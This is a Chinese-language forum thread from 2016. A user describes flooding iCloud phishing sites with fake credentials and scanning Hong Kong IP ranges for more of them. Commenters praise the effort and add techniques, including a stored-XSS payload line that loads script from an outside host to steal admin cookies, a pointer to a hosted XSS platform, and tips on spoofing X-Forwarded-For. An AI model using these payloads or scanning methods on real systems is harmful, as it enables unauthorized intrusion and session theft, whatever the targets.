V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
推荐学习书目
Learn Python the Hard Way
Python Sites
PyPI - Python Package Index
http://diveintopython.org/toc/index.html
Pocoo
值得关注的项目
PyPy
Celery
Jinja2
Read the Docs
gevent
pyenv
virtualenv
Stackless Python
Beautiful Soup
结巴中文分词
Green Unicorn
Sentry
Shovel
Pyflakes
pytest
Python 编程
pep8 Checker
Styles
PEP 8
Google Python Style Guide
Code Style from The Hitchhiker's Guide
0x5e
V2EX  ›  Python

发现一大波 icloud 钓鱼网站。。。

  •  
  •   0x5e ·
    0x5e · 2016-07-21 17:28:00 +08:00 · 5994 次点击
    这是一个创建于 3031 天前的主题,其中的信息可能已经有所发展或是发生改变。

    最近同学手机被偷了,不断收到各种骗 appleid 的短信和邮件。。做了点好事,往钓鱼网站里 post 了好多好多假数据,过几天他就关了😁

    后来还是不断收到各种钓鱼网站,如法炮制,最后没几天也都关了

    再后来发现 ip 基本都是香港的,于是写脚本对部分香港 ip 段扫了下,卧槽扫出 100 多个服务器。。。

    于是给他们 post 点假数据:随机 9 位 qq 号 @qq.com/随机密码 不知道有没有用,不过至少按照前面的情况,能让他们都关服就可以了。。

    请问各位有没有钓鱼网址提供,如果和我见到的是同类型的,我可以帮忙造点假数据进去。。 标题是 find my iphone ,模仿“找回我的 iPhone ”做的钓鱼网站

    http://i2.piimg.com/567571/85f4ce3c10dbe286.jpg

    32 条回复    2017-03-10 08:35:37 +08:00
    t333st
        1
    t333st  
       2016-07-21 17:40:32 +08:00   ❤️ 2
    其实可以提交 xss
    chroming
        2
    chroming  
       2016-07-21 17:49:02 +08:00
    这个不错
    leonis
        3
    leonis  
       2016-07-21 17:52:26 +08:00
    干得好
    aheadlead
        4
    aheadlead  
       2016-07-21 17:56:06 +08:00
    干脆咱们建个 repo 然后维护一个 icloud 钓鱼站列表
    loading
        5
    loading  
       2016-07-21 18:09:10 +08:00 via Android
    楼主挂了代理池没?不然一句 sql 就把你的假数据过滤了。
    ji1043
        6
    ji1043  
       2016-07-21 18:16:11 +08:00
    好同志! 话说 你 Ip 怎么解决的???买的?
    tracedocting
        7
    tracedocting  
       2016-07-21 18:17:55 +08:00
    之前垃圾邮件里面有一堆钓鱼的,可惜随手删了……
    SlipStupig
        8
    SlipStupig  
       2016-07-21 18:28:37 +08:00
    @aheadlead 没什么用,过两天人家就关站了
    0x5e
        9
    0x5e  
    OP
       2016-07-21 18:40:30 +08:00
    @aheadlead 对的,没两天就关了
    @loading 没挂,就改了改'X-Forwarded-For',我看网站是 ASP.NET 的,被过滤我也没什么办法了,至少这几天试下来刷一两天他就关了,算是其中一个目的达成了吧。。。如果欺骗不了他,让他关站也是好的,避免后人上当么。。
    @ji1043 我就是用自己电脑刷的。。
    qfdk
        10
    qfdk  
       2016-07-21 18:58:15 +08:00
    用 xss 打它把 这个比较好玩儿 :) 拿了后台直接删东西
    0x5e
        11
    0x5e  
    OP
       2016-07-21 19:03:20 +08:00
    @qfdk 不会。。求指导
    qfdk
        12
    qfdk  
       2016-07-21 19:09:18 +08:00
    @0x5e http://123.57.48.113/xss//index.php?do=login 注册个帐号,然后会有一个<script>xxx</script>的玩意儿, 把假的用户名或者密码换成这个玩意儿,只要那个人浏览了要是没有做过滤,你会得到他的 cookie :) 然后火狐改个 cookie 就能直接登录后台了,打 QQ 片子屡试不爽
    wilddog
        13
    wilddog  
       2016-07-21 19:10:52 +08:00
    0x5e
        14
    0x5e  
    OP
       2016-07-21 19:15:20 +08:00
    @qfdk 卧槽。。学习了。。我试下😁 多谢~
    ctsed
        15
    ctsed  
       2016-07-21 19:19:46 +08:00 via iPhone
    你不管他也会关的 生命周期很短 有的类型就存活几个小时
    iwj
        16
    iwj  
       2016-07-21 19:24:48 +08:00
    想学习一下代码,可以分享一下吗
    qfdk
        17
    qfdk  
       2016-07-21 19:34:29 +08:00
    @0x5e 这个平台我顺手百度的,可信行不知道,你可以用源码自己搭一个平台,乌云有说明
    panda0
        18
    panda0  
       2016-07-21 19:38:13 +08:00
    @qfdk 出错了
    sephinh
        19
    sephinh  
       2016-07-21 19:48:58 +08:00 via Android
    干得好~~~
    0x5e
        20
    0x5e  
    OP
       2016-07-21 22:02:30 +08:00
    @qfdk 各种注册失败。。完了我感觉被套路了😂
    能给个关键字不,就叫 xss 平台吗,乌云现在进不去了。。
    qfdk
        21
    qfdk  
       2016-07-21 22:08:20 +08:00
    @0x5e xssplatform.zip 找一个叫做这个东西的,然后自己搭建。
    0x5e
        22
    0x5e  
    OP
       2016-07-21 22:16:59 +08:00
    @qfdk 多谢,不过我刚试了下,我扫的这些服务器应该是处理过了。。😁
    0x5e
        23
    0x5e  
    OP
       2016-07-21 22:20:08 +08:00
    @iwj 写的有点挫,而且钓鱼网站多种多样可能没法通用。。。
    https://gist.github.com/0x5e/3125096158adddc45a5a9351a7418942
    0x5e
        24
    0x5e  
    OP
       2016-07-21 22:24:08 +08:00
    @ctsed 可能吧,不过感觉这网站也挺挫的,要是真心想过滤的话可以搞个 ip 防火墙什么的,说不准也没记录下账号密码对应的 ip ,又或许说不准 ip 是从 X-Forwarded-For 取的。。反正闲着也是闲着我就开着刷一下吧 。。😁
    DravenJohnson
        25
    DravenJohnson  
       2016-07-22 10:02:50 +08:00
    还有这东西?
    Ra8er
        26
    Ra8er  
       2016-07-22 11:18:06 +08:00
    见一个 日一个
    njutree
        27
    njutree  
       2016-07-22 13:11:09 +08:00
    干的漂亮,对于这些人就该给他们大量的假数据让他们干不了坏事。
    fishcat
        28
    fishcat  
       2016-07-22 15:42:47 +08:00
    @qfdk 你的那个网站我不能注册
    qfdk
        29
    qfdk  
       2016-07-22 15:46:07 +08:00
    @fishcat 上都说了是顺手百度的- - 需要的自己搭建就好了
    qfdk
        30
    qfdk  
       2016-07-22 15:50:07 +08:00
    最简单的方法是写个 form ,这样网站的 js 都用不了,然后 user 写上你得到的代码<script src=http://t.cn/Rt2iRuv></script> passwd 也可以,最后这个会插入 他们数据库,如果没有过滤的话,当他们打开你会得到 cookie ,其中还有 keepsession 的选项
    meppy
        31
    meppy  
       2016-07-22 18:25:43 +08:00
    都是高手,学习了
    cybermay
        32
    cybermay  
       2017-03-10 08:35:37 +08:00
    你不灌数据他也会关的 骗到了账号就会关 然后再开
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   3555 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 27ms · UTC 10:36 · PVG 18:36 · LAX 02:36 · JFK 05:36
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.